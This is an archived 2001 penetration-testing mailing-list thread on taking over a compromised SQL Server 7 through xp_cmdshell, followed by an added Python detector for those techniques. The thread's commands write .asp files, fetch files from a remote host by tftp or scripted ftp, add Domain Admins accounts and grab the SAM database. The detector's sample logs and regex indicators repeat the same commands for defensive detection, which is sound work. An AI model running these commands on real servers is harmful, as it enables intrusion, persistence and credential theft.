Penetration Testing mailing list archives

Re: [PEN-TEST] Hacking a server through SQL SERVER 7


From: MadHat <madhat () UNSPECIFIC COM>
Date: Thu, 25 Jan 2001 14:25:41 -0600

At 01:40 PM 1/25/2001 -0500, you wrote:
If I understand your question, try:

xp_cmdshell 'echo filecontent > c:\file.asp'

This will create a file named 'file.asp', with the text 'filecontent' in it.

If UDP port 69 is open, you can use tftp easily:

xp_cmdshell 'tftp remotehost get file.asp c:\destination_file.asp'

Or if you can FTP from inside, you can use FTP to grab files off of other
servers from the SQL server with an ftp script.
It has been a while since I played with this, so the syntax may be a little
off, but basically

xp_cmdshell 'echo user > script.file; echo pass >> script.file; echo bin >>
script.file; echo get file.asp >> script.file; echo quit>>script.file; ftp
-s:script.file remotehost'

The script file is line by line what will be sent to the ftp once the
connection is made, if I am not mistaken, so you need the user, the pass
and whatever commands you would use... like

anonymous
user () here com
ascii
get file.asp c:\des_file.asp
quit

so though you can't FTP in, you might be able to FTP out.


Aaron C. Newman

> -----Original Message-----
> From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf
> Of FiC
> Sent: Thursday, January 25, 2001 4:33 AM
> To: PEN-TEST () SECURITYFOCUS COM
> Subject: Re: [PEN-TEST] Hacking a server through SQL SERVER 7
>
>
> Thank you all for your valuable information.
>
> Is there any way to upload/create a file in the hacked SQL SERVER through the
> system commands? I think that the machine is behind a Firewall and even if I
> start the FTP service I can't connect via ftp, and the port 139 is not open
> or it's filtered. I've tried to create an .asp file with the "copy con"
> command, but I can't do it through the SQL console. How can I upload/create
> an .asp file to this server?
>
> Thanx.
>
>
> > Once you have access to an MSSQL 7 server via the "sa" account, you can do
> > all sorts of fun things:
> >
> > Run system commands:
> >
> > EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD /DOMAIN"
> > EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins' newuser /ADD /DOMAIN"
> >
> > You can also access the registry, send email, dump system information...
> > Take a look at some of the Extended Stored Procedures in the [master]
> > database with SQL Query Analyzer.  Depending on the user the server runs as
> > (normally SYSTEM or Administrator), you can usually use xp_cmdshell to
> > rebuild the repair disk data with rdisk /s and snag the SAM database.
> >
> > I will be giving a presentation at the upcoming CanSecWest conference
> > covering a variety of SQL server attacks, everything from general procedure
> > exploitation to insertion techniques.  At the conference, I will be
> > releasing a handful of new tools, one of which exploits the RDS component
> > in new ways, allowing access to SQL servers as well as proxying requests to
> > internal systems through it.  For more information on the conference,
> > please see http://www.cansecwest.com, online registration should be
> > available within a few weeks.
>
> --
> ~/ FiC /~
>

--
MadHat at unspecific.com
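The thread above describes how an attacker with `sa` uses `xp_cmdshell` to drop files (`echo ... >`), pull them in with `tftp` or a scripted `ftp -s:` session, and add accounts. The following is an added example, not part of the thread and not code from any of its authors: a small detector that turns those same indicators into detection logic over SQL Server query-audit records. The log line format (`timestamp login=... text=...`) is an assumed, constructed export format, and the sample records are constructed for the example.

```python
import re

# Constructed sample records (not real audit data) in an assumed
# "<date> <time> login=<login> text=<statement>" export format.
SAMPLE_LOG = """\
2001-01-25 14:20:01 login=sa text=SELECT name FROM sysobjects WHERE type = 'P'
2001-01-25 14:21:10 login=sa text=xp_cmdshell 'echo filecontent > c:\\file.asp'
2001-01-25 14:22:33 login=sa text=xp_cmdshell 'tftp remotehost get file.asp c:\\destination_file.asp'
2001-01-25 14:23:05 login=webapp text=EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD /DOMAIN"
2001-01-25 14:24:40 login=reports text=SELECT COUNT(*) FROM orders
2001-01-25 14:25:12 login=sa text=xp_cmdshell 'echo user > script.file; ftp -s:script.file remotehost'
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) login=(?P<login>\S+) text=(?P<text>.*)$")
XP_CMDSHELL_RE = re.compile(r"xp_cmdshell", re.I)

# Indicators taken from the techniques discussed in the thread. Order matters:
# reasons are reported in this order.
INDICATORS = [
    ("file-write via echo redirection", re.compile(r"echo\b.*>\s*\S+", re.I)),
    ("web script (.asp) referenced", re.compile(r"\.asp\b", re.I)),
    ("tftp transfer", re.compile(r"\btftp\b", re.I)),
    ("ftp scripted session", re.compile(r"\bftp\s+-s:", re.I)),
    ("account/group change", re.compile(r"\bnet\s+(user|group|localgroup)\b.*/add", re.I)),
    ("repair-disk / SAM backup", re.compile(r"\brdisk\b", re.I)),
]


def parse_line(line):
    """Return the fields of one audit record, or None if the line does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(text):
    """Return the list of reasons a statement is suspicious (empty if it is not).

    Any xp_cmdshell call is reported; the OS-command indicators above refine it.
    """
    if not XP_CMDSHELL_RE.search(text):
        return []
    reasons = ["xp_cmdshell invocation"]
    for label, pattern in INDICATORS:
        if pattern.search(text):
            reasons.append(label)
    return reasons


def scan(log_text):
    """Scan an audit export and return one finding per suspicious record."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines rather than failing the whole scan
        reasons = classify(rec["text"])
        if reasons:
            findings.append(
                {"ts": rec["ts"], "login": rec["login"], "reasons": reasons, "text": rec["text"]}
            )
    return findings


def logins_with_cmdshell(findings):
    """Which logins executed xp_cmdshell at all; useful for scoping a response."""
    return sorted({f["login"] for f in findings})


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['login']:8} {', '.join(f['reasons'])}")
        print(f"    {f['text']}")
    print("logins:", logins_with_cmdshell(scan(SAMPLE_LOG)))
```

Any `xp_cmdshell` call from an application login (here `webapp`) is worth an alert on its own; the extra reasons show which stage of the file-drop sequence from the thread (write, transfer, persistence) a given record corresponds to. In practice this sits beside restricting which logins may execute `xp_cmdshell` at all, rather than replacing it.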

